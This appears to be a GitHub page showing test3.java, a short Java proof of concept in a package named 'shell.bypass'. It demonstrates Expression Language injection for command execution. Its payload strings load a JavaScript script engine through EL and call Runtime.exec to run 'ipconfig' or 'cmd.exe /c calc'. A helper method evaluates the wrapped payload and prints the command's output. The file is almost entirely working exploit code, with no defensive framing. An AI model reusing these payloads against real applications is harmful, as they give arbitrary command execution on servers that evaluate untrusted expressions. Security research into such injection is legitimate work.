forked from Firebasky/Java
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathtest3.java
More file actions
40 lines (35 loc) · 1.76 KB
/
test3.java
File metadata and controls
40 lines (35 loc) · 1.76 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
package shell.bypass;
import javax.el.ELManager;
import javax.el.ExpressionFactory;
import javax.el.StandardELContext;
import javax.el.ValueExpression;
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class test3 {
public static void main(String[] args) throws Exception {
String payload = "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(\"var exp='ipconfig';java.lang.Runtime.getRuntime().exec(exp);\")";
String poc = "''.getClass().forName('javax.script.ScriptEngineManager')" +
".newInstance().getEngineByName('nashorn')" +
".eval(\"s=[3];s[0]='cmd.exe';s[1]='/c';s[2]='calc';java.lang.Runtime.getRuntime().exec(s);\")";
ELeval(payload);
}
public static void ELeval(String payload) throws Exception{
ELManager elManager = new ELManager();
StandardELContext elContext = elManager.getELContext();//获得this.context
ExpressionFactory expressionFactory = elManager.getExpressionFactory();//然后this.factory=expressionFactory
/*
private static String bracket(String expression) {
return "${" + expression + "}";
}
*/
ValueExpression valueExpression = expressionFactory.createValueExpression(elContext, "${" + payload + "}", Object.class);
InputStream inputStream = ((Process) valueExpression.getValue(elContext)).getInputStream();
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(inputStream));
String line;
while ((line=bufferedReader.readLine())!=null){
System.out.println(line);
}
bufferedReader.close();
}
}